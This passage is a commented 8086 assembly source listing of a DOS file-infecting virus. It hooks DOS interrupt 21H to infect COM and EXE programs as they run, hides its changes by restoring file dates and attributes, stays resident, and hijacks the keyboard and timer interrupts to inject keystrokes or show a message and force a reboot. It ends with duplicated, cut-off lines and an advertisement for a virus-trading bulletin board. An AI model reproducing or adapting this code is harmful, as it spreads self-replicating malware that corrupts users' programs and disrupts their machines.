DB 29H, 1EH, 30H, 2EH, 20H, 12H, 21H, 22H ; 60 - 67
DB 23H, 17H, 24H, 25H, 26H, 32H, 31H, 18H ; 68 - 6F
DB 19H, 10H, 13H, 1FH, 14H, 16H, 2FH, 11H ; 70 - 77
DB 2DH, 15H, 2CH, 1AH, 2BH, 1BH, 29H, 0EH ; 78 - 7F
; This section assumes a COM origin of 100H
BP0010: CLD
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0020 ; Branch if invalid reply
CMP AH,4 ; Test for standard "yes"
JB BP0020 ; Branch if non-standard
MOV AH,0DDH ; Replace program over virus
MOV DI,0100H ; Initial offset
MOV SI,OFFSET ENDADR ; Length of virus
ADD SI,DI ; Add initial offset
MOV CX,F_SIZE[DI] ; Get total filesize
INT 21H ; DOS service (Virus - 2)
; Virus not in system, or non-communicating variety
BP0020: MOV AX,CS ; Get current segment
ADD AX,10H ; Address past PSP
MOV PRG_SP,SP ; Save current value
MOV SS,AX ; \ Set up stack
MOV SP,OFFSET ENDADR+100H ; /
PUSH AX ; Segment for return
MOV AX,OFFSET BP0030 ; \ Offset for return
PUSH AX ; /
RETF ; "Return" to next instruction
; We now have an origin of zero
; Entry point when attached to an EXE file
BP0030: CLD
PUSH ES
MOV ST_ES1,ES ; Save original ES
MOV PPB_03,ES ; \
MOV PPB_05,ES ; ) Segments in PPB
MOV PPB_07,ES ; /
MOV AX,ES ; \ Segment relocation factor
ADD AX,10H ; /
ADD PRGSEG,AX ; Initial code segment store
ADD PRG_SS,AX ; Initial stack segment store
MOV AH,0E1H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E1H ; Test for unchanged
JNB BP0040 ; Branch if not
CMP AH,4 ; Test for standard "yes"
POP ES
MOV SS,PRG_SS ; Initial stack segment store
MOV SP,PRG_SP ; Initial stack pointer store
JMP PROGRM ; Start of actual program
; Virus is not already active
BP0040: XOR AX,AX ; \ Address page zero
MOV ES,AX ; /
MOV AX,BW03FC ; \ Save system area data (1)
MOV SS_ST1,AX ; /
MOV AL,BB03FE ; \ Save system area data (2)
MOV SS_ST2,AL ; /
MOV BW03FC,0A4F3H ; Store REPZ MOVSB
MOV BB03FE,0CBH ; Store RETF
POP AX ; \
ADD AX,10H ; ) Address past PSP
MOV ES,AX ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV CX,OFFSET ENDADR ; Length of virus
XOR SI,SI ; \ Clear registers
MOV DI,SI ; /
PUSH ES ; \
MOV AX,OFFSET BP0050 ; ) Set up return address
PUSH AX ; /
DB 0EAH ; \ Far jump to move instruction
DW BW03FC, 0 ; /
BP0050: MOV AX,CS ; \
MOV SS,AX ; ) Set up internal stack
MOV SP,OFFSET ENDADR+100H ; /
XOR AX,AX ; \ Address page zero
MOV DS,AX ; /
ASSUME DS:RAM,ES:NOTHING
MOV AX,SS_ST1 ; \ Restore system area data (1)
MOV BW03FC,AX ; /
MOV AL,SS_ST2 ; \ Restore system area data (2)
MOV BB03FE,AL ; /
MOV BX,SP ; Get stack pointer
MOV CL,4 ; \ Convert to paragraphs
SHR BX,CL ; /
ADD BX,10H ; Allow for PSP
MOV SET_PA,BX ; Save number of paragraphs
MOV ES,ST_ES1 ; Get original ES
MOV AH,4AH ; Set block
INT 21H ; DOS service (Set block)
MOV AX,3521H ; Get interrupt 21H
INT 21H ; DOS service (Get int)
MOV I21OFF,BX ; Save interrupt 21H offset
MOV I21SEG,ES ; Save interrupt 21H segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV DX,OFFSET BP0170 ; Interrupt 21H routine
MOV AX,2521H ; Set interrupt 21H
INT 21H ; DOS service (Set int)
MOV ES,ST_ES1 ; Get original ES
ASSUME ES:RAM
MOV ES,ES:ENV_SG ; Get environment segment
XOR DI,DI ; Start of environment
MOV CX,7FFFH ; Allow for 32K environment
XOR AL,AL ; Search for zero
BP0060: REPNZ SCASB ; Find zero
CMP ES:[DI],AL ; Is following character zero
LOOPNZ BP0060 ; Search again if not
MOV DX,DI ; Save pointer
ADD DX,3 ; Address pathname
MOV AX,4B00H ; Load and execute program
PUSH ES ; \ Set DS to ES
POP DS ; /
PUSH CS ; \ Set ES to CS
POP ES ; /
ASSUME DS:RAM,ES:NOTHING
MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
; Install interrupt 9 routine
MOV AX,3509H ; Get interrupt 9
INT 21H ; DOS service (Get int)
MOV I09OFF,BX ; Save interrupt 9 offset
MOV I09SEG,ES ; Save interrupt 9 segment
MOV AX,2509H ; Set interrupt 9
MOV DX,OFFSET BP0150 ; Interrupt 9 routine
INT 21H ; DOS service (Set int)
MOV AH,2AH ; Get date
INT 21H ; DOS service (Get date)
CMP CX,07C5H ; Year = 1989
JL BP0070 ; Branch if before
CMP DH,8 ; Month = August
JL BP0070 ; Branch if before
; Install interrupt 16H routine
MOV OUT_SW,0 ; Set off output switch
MOV AX,3516H ; Get interrupt 16H
INT 21H ; DOS service (Get int)
MOV I16OFF,BX ; Save interrupt 16H offset
MOV I16SEG,ES ; Save interrupt 16H segment
MOV AX,2516H ; Set interrupt 16H
MOV DX,OFFSET BP0540 ; Interrupt 16H routine
INT 21H ; DOS service (Set int)
BP0070: MOV BL,BB046C ; Get low byte of system clock
MOV BH,BL ; Copy
AND BX,0F00FH ; Isolate nibbles
CMP BL,0 ; Is low nibble of clock zero?
JNE BP0080 ; Branch if not
MOV CL,4 ; Bits to move
SHR BH,CL ; Move top nibble to bottom
CMP BH,0 ; Is second nibble of clock zero?
JE BP0080 ; Branch if yes
XOR AX,AX ; Clear register
MOV TCOUNT1,AX ; Set timer count (low)
MOV AL,BH ; Get second nibble of system clock
MOV TCOUNT2,AX ; Set timer count (high)
; Install interrupt 8 routine
MOV AX,3508H ; Get interrupt 8
INT 21H ; DOS service (Get int)
MOV I08OFF,BX ; Save interrupt 8 offset
MOV I08SEG,ES ; Save interrupt 8 segment
MOV AX,2508H ; Set interrupt 8
MOV DX,OFFSET BP0100 ; Interrupt 8 routine
INT 21H ; DOS service (Set int)
BP0080: POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
ASSUME DS:NOTHING
PUSHF ; Fake an interrupt
CALL INT_21 ; Interrupt 21H (Load and execute)
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
MOV AH,4DH ; Get return code of child process
INT 21H ; DOS service (Get return code)
MOV AH,31H ; Keep process
MOV DX,OFFSET ENDADR ; Length of program
MOV CL,4 ; \ Convert to paragraphs
SHR DX,CL ; /
ADD DX,10H ; Add length of PSP
INT 21H ; DOS service (Keep process)
; Interrupt 24H
BP0090: XOR AL,AL ; Ignore the error
IRET
; Interrupt 8
BP0100: SUB TCOUNT1,1 ; \ Subtract from timer count
SBB TCOUNT2,0 ; /
JNZ BP0140 ; Branch if not zero
CMP TCOUNT1,0 ; Is low count zero?
JNZ BP0140 ; Branch if not
BP0110: PUSH CS ; \ Set DS to CS
POP DS ; /
MOV AX,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Move cursor
MOV BH,0 ; Page zero
MOV DX,0A14H ; Row ten column twenty
INT 10H ; VDU I/O
MOV SI,OFFSET STRNG8 ; Address message
BP0120: LOOP BP0120 ; Delay between characters
LODSB ; Get a character
CMP AL,0 ; Is that the end?
JE BP0130 ; Branch if yes
XOR AL,0AFH ; Decrypt character
MOV AH,14 ; Write in TTY mode
INT 10H ; VDU I/O
JMP BP0120 ; Next character
BP0130: DB 0EAH ; Far jump to BIOS initialisation
DW 0FFF0H, 0F000H
BP0140: JMP INT_08 ; Interrupt 8
; Interrupt 9
ASSUME DS:RAM
BP0150: PUSH AX
PUSH BX
PUSH DS
XOR AX,AX ; \ Address zero
MOV DS,AX ; /
IN AL,60H ; Get keyboard token
MOV BL,BB0417 ; Get key states
TEST BL,8 ; Alt key depressed?
JZ BP0160 ; Branch if not
TEST BL,4 ; Ctrl key depressed?
JZ BP0160 ; Branch if not
CMP AL,53H ; Del character token?
JNE BP0160 ; Branch if not
AND BL,0F3H ; Set off Alt & Ctrl states
MOV BB0417,BL ; Replace key states
IN AL,61H ; Get Port B
MOV AH,AL ; Save value
OR AL,80H ; Set on keyboard reset bit
OUT 61H,AL ; Output port B
XCHG AL,AH ; Recover original Port B value
OUT 61H,AL ; Output port B
JMP BP0110 ; Message and reboot
BP0160: POP DS
POP BX
POP AX
JMP INT_09 ; Interrupt 9
; Interrupt 21H
BP0170: PUSHF
CMP AH,0E1H ; Virus "are you there" call
JNE BP0180 ; Branch if other call
MOV AX,0400H ; Standard "yes"
POPF
IRET
BP0180: CMP AH,0DDH ; Virus move and execute COM call
JE BP0200 ; Branch if yes
CMP AX,4B00H ; Is it load and execute
JNE BP0190 ; Branch if not
JMP BP0210 ; Process load and execute
BP0190: POPF
JMP INT_21 ; Interrupt 21H
; Move program down and execute (COM only) call
ASSUME DS:NOTHING
BP0200: POP AX
POP AX ; Retrieve return offset
MOV AX,100H ; Replace with start address
MOV V_RTOF,AX ; Store in return jump
POP AX ; Retrieve return segment
MOV V_RTSG,AX ; Store in return jump
REPZ MOVSB ; Restore program to beginning
POPF
MOV AX,BEGIN ; Start with zero register
JMP VIR_RT ; Start actual program
; Process load and execute program
BP0210: MOV F_HAND,-1 ; No file handle
MOV MEM_SW,0 ; Set off memory allocated switch
MOV FPTHOF,DX ; Save pathname offset
MOV FPTHSG,DS ; Save pathname segment
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CLD
MOV DI,DX ; Point to file pathname
XOR DL,DL ; Default drive
CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
JNE BP0220 ; Branch if not
MOV DL,[DI] ; Get drive letter
AND DL,1FH ; Convert to number
BP0220: MOV AH,36H ; Get disk free space
INT 21H ; DOS service (Get disk free)
CMP AX,-1 ; Test for invalid drive
JNE BP0240 ; Branch if not
BP0230: JMP BP0530 ; Terminate
BP0240: MUL BX ; Calc number of free sectors
MUL CX ; Calc number of free bytes
OR DX,DX ; Test high word of result
JNZ BP0250 ; Branch if not zero
CMP AX,OFFSET ENDADR ; Length of virus
JB BP0230 ; Terminate if less
BP0250: MOV DX,FPTHOF ; Get pathname offset
PUSH DS ; \ Set ES to DS
POP ES ; /
XOR AL,AL ; Test character - zero
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
MOV SI,FPTHOF ; Get pathname offset
BP0260: MOV AL,[SI] ; Get pathname character
OR AL,AL ; Test for a character
JZ BP0280 ; Finish if none
CMP AL,61H ; Test for 'a'
JB BP0270 ; Branch if less
CMP AL,7AH ; Test for 'z'
JA BP0270 ; Branch if above
SUB BYTE PTR [SI],20H ; Convert to uppercase
BP0270: INC SI ; Address next character
JMP BP0260 ; Process next character
BP0280: MOV CX,0BH ; Load length 11
SUB SI,CX ; Address back by length
MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,0BH ; Load length again
REPZ CMPSB ; Compare
JNE BP0290 ; Continue if not command.com
JMP BP0530 ; Terminate
BP0290: MOV AX,4300H ; Get file attributes
INT 21H ; DOS service (Get attributes)
JB BP0300 ; Follow chain of error branches
MOV F_ATTS,CX ; Save file attributes
BP0300: JB BP0320 ; Follow chain of error branches
XOR AL,AL ; Scan character - zero
MOV EXE_SW,AL ; Set EXE switch off
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Pointer to pathname
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
JE BP0310 ; Branch if yes
CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
JE BP0310 ; Branch if yes
INC EXE_SW ; Set EXE switch on
BP0310: MOV AX,3D00H ; Open handle, read only
INT 21H ; DOS service (Open handle)
BP0320: JB BP0330 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV BX,AX ; File handle
CMP EXE_SW,0 ; Test EXE switch
JE BP0340 ; Branch if off
; Test EXE file for infection
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0330: JB BP0370 ; Follow chain of error branches
CMP EXHD09,1988H ; Negative checksum
JNE BP0360 ; Branch if not infected
JMP BP0350 ; Dont infect
ASSUME DS:NOTHING
BP0340: MOV AX,4202H ; Move file pointer
MOV CX,-1 ; \ End of file minus 6
MOV DX,-6 ; /
INT 21H ; DOS service (Move pointer)
JB BP0320 ; Follow chain of error branches
ADD AX,6 ; Total file size
MOV F_SIZE,AX ; Save total file size
MOV CX,6 ; Length to read
MOV DX,OFFSET SIGBUF ; Infection test buffer
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
MOV DI,DX ; Address test buffer
MOV SI,OFFSET VR_SIG ; Signature
REPZ CMPSB ; Compare signatures
JNE BP0360 ; Branch if not infected
BP0350: MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0360: MOV AX,3524H ; Get interrupt 24H
INT 21H ; DOS service (Get int)
MOV I24OFF,BX ; Save interrupt 24H offset
MOV I24SEG,ES ; Save interrupt 24H segment
MOV DX,OFFSET BP0090 ; Interrupt 24H routine
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
LDS DX,F_PATH ; Address program pathname
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
ASSUME DS:NOTHING
BP0370: JB BP0380 ; Follow chain of error branches
MOV BX,F_HAND ; Get file handle
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
MOV F_HAND,-1 ; No file handle
MOV AX,3D02H ; Open handle read/write
INT 21H ; DOS service (Open handle)
JB BP0380 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV BX,F_HAND ; Get file handle
MOV AX,5700H ; Get file date and time
INT 21H ; DOS service (Get file date)
MOV F_DATE,DX ; Save file date
MOV F_TIME,CX ; Save file time
MOV AX,4200H ; Move file pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
INT 21H ; DOS service (Move pointer)
BP0380: JB BP0410 ; Follow chain of error branches
CMP EXE_SW,0 ; Test EXE switch
JE BP0390 ; Branch if off
JMP BP0430 ; Process EXE file
; .COM file processing
BP0390: MOV BX,1000H ; 64K of memory wanted
MOV AH,48H ; Allocate memory
INT 21H ; DOS service (Allocate memory)
JNB BP0400 ; Branch if successful
MOV AH,3EH ; Close handle
MOV BX,F_HAND ; Get file handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0400: INC MEM_SW ; Set on memory allocated switch
MOV ES,AX ; Segment of allocated memory
XOR SI,SI ; Start of virus
MOV DI,SI ; Start of allocated memory
MOV CX,OFFSET ENDADR ; Length of virus
REPZ MOVSB ; Copy virus to allocated
MOV DX,DI ; Address after virus
MOV CX,F_SIZE ; Total file size
MOV BX,F_HAND ; Get file handle
PUSH ES ; \ Set DS to ES
POP DS ; /
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0410: JB BP0420 ; Follow chain of error branches
ADD DI,CX ; Add previous file size
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
MOV SI,OFFSET VR_SIG ; Signature
MOV CX,6 ; Length to move
REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
MOV CX,DI ; Length to write
XOR DX,DX ; Start of allocated
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0420: JB BP0440 ; Follow chain of error branches
JMP BP0510 ; Free memory and reset values
; .EXE file processing
BP0430: MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0440: JB BP0460 ; Follow chain of error branches
MOV EXHD09,1988H ; Negative checksum
MOV AX,EXHD07 ; \ Store initial stack segment
MOV PRG_SS,AX ; /
MOV AX,EXHD08 ; \ Store initial stack pointer
MOV PRG_SP,AX ; /
MOV AX,EXHD10 ; \ Store initial code offset
MOV PRGOFF,AX ; /
MOV AX,EXHD11 ; \ Store initial code segment
MOV PRGSEG,AX ; /
MOV AX,EXHD02 ; Get size of file in pages
CMP EXHD01,0 ; Number of bytes in last page
JE BP0450 ; Branch if none
DEC AX ; One less page
BP0450: MUL BYTSEC ; Bytes per sector
ADD AX,EXHD01 ; \ Add bytes in last page
ADC DX,0 ; /
ADD AX,0FH ; \ Round up
ADC DX,0 ; /
AND AX,0FFF0H ; Clear bottom figure
MOV F_SIZ1,AX ; Save low-order file size
MOV F_SIZ2,DX ; Save high-order file size
ADD AX,OFFSET ENDADR ; \ Add virus length
ADC DX,0 ; /
BP0460: JB BP0480 ; Follow chain of error branches
DIV BYTSEC ; Bytes per sector
OR DX,DX ; Test odd bytes
JZ BP0470 ; Branch if none
INC AX ; One more page for odd bytes
BP0470: MOV EXHD02,AX ; Store size of file in pages
MOV EXHD01,DX ; Store bytes in last page
MOV AX,F_SIZ1 ; Low-order file size
MOV DX,F_SIZ2 ; High-order file size
DIV PARAGR ; Size of a paragraph
SUB AX,EXHD04 ; Size of header in paragraphs
MOV EXHD11,AX ; Initial code segment
MOV EXHD10,OFFSET BP0030 ; Initial code offset
MOV EXHD07,AX ; Initial stack segment
MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0480: JB BP0490 ; Follow chain of error branches
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0490: JB BP0500 ; Follow chain of error branches
CMP AX,CX ; Has same length been written
JNE BP0510 ; Branch if not
MOV DX,F_SIZ1 ; Low-order file size
MOV CX,F_SIZ2 ; High-order file size
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0500: JB BP0510 ; Follow chain of error branches
XOR DX,DX ; Address beginning of virus
MOV CX,OFFSET ENDADR ; Length of virus
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
ASSUME DS:NOTHING
BP0510: CMP MEM_SW,0 ; Test memory allocated switch
JE BP0520 ; Branch if off
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
BP0520: CMP F_HAND,-1 ; Test file handle
JE BP0530 ; Terminate if none
MOV BX,F_HAND ; Get file handle
MOV DX,F_DATE ; Get file date
MOV CX,F_TIME ; Get file time
MOV AX,5701H ; Set file date and time
INT 21H ; DOS service (Set file date)
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
LDS DX,F_PATH ; Address program pathname
MOV CX,F_ATTS ; Load file attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
LDS DX,INT_24 ; Original interrupt 24H address
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
BP0530: POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP INT_21 ; Interrupt 21H
; Interrupt 16H routine
BP0540: PUSHF ; Fake an interrupt
CMP AH,0 ; Get a token function?
JE BP0550 ; Branch if yes
POPF ; Fake interrupt not needed
JMP INT_16 ; Pass on to original interrupt
BP0550: CALL INT_16 ; Deal with original interrupt
PUSH AX
PUSH BX
PUSH DI
PUSH DS
PUSH ES
PUSH CS ; \ Set DS to CS
POP DS ; /
XOR BX,BX ; \ Set ES to zero
MOV ES,BX ; /
ASSUME DS:CODE,ES:RAM
CMP OUT_SW,0 ; Is output switch on?
JNE BP0630 ; Branch if yes
OR AL,20H ; Convert to lower case
XOR AL,0AFH ; Decrypt character
MOV DI,OFFSET TABLE ; Address first entry
BP0560: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0590 ; Branch if yes
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add current entry pointer
CMP AL,[BX] ; Is character the one we want?
JE BP0570 ; Branch if yes
MOV BYTE PTR [DI+1],0 ; Clear character pointer
JMP BP0580
BP0570: INC BYTE PTR [DI+1]
BP0580: ADD DI,4 ; Next entry
JMP BP0560 ; Process next entry
BP0590: MOV DI,OFFSET TABLE ; Address first entry
BP0600: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0610 ; Branch if yes
MOV AL,[DI+1] ; Get current character pointer
CMP AL,[DI] ; Do we have a complete match?
JNE BP0620 ; Branch if not
MOV TABOUT,DI ; Save relevant pointer
INC OUT_SW ; Set on output switch
MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
ASSUME ES:RAM40
MOV AX,BW041A ; Get key token in pointer
MOV BW041C,AX ; Set key token out pointer
CALL BP0640 ; Put a character into the buffer
BP0610: POP ES
POP DS
POP DI
POP BX
POP AX
IRET
BP0620: ADD DI,4 ; Next entry
JMP BP0600 ; Process next entry
BP0630: MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
CALL BP0640 ; Put a character into the buffer
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
CMP BYTE PTR [BX],0 ; Was that the last character?
JNE BP0610 ; Branch if not
MOV OUT_SW,0 ; Set off output switch
JMP BP0610
BP0640: MOV DI,TABOUT ; Address relevant table entry
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
MOV AL,[BX] ; Get the character
XOR AL,0AFH ; Decrypt character
INC BYTE PTR [DI+1] ; Next character
MOV AH,AL ; Copy for translate
MOV BX,OFFSET KEYTAB ; Address key number table
XLAT ; Get key number
XCHG AH,AL ; Reserve order
MOV BX,BW041C ; Get key token out pointer
MOV ES:[BX],AX ; Put key token into buffer
INC BX ; \ Next buffer position
INC BX ; /
CMP BX,BW0482 ; Passed end of buffer?
JNE BP0650 ; Branch if not
MOV BX,BW0480 ; Get buffer start
BP0650: MOV BW041C,BX ; Save new key token out pointer
RET
; Stack area - This is also necessary to make the virus a complete
; number of paragraphs
DB 04CH, 002H, 0AAH, 031H, 09EH, 002H, 0A5H, 031H
ENDADR EQU $
CODE ENDS
END START
ete
; number of paragraphs
DB 04CH,
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ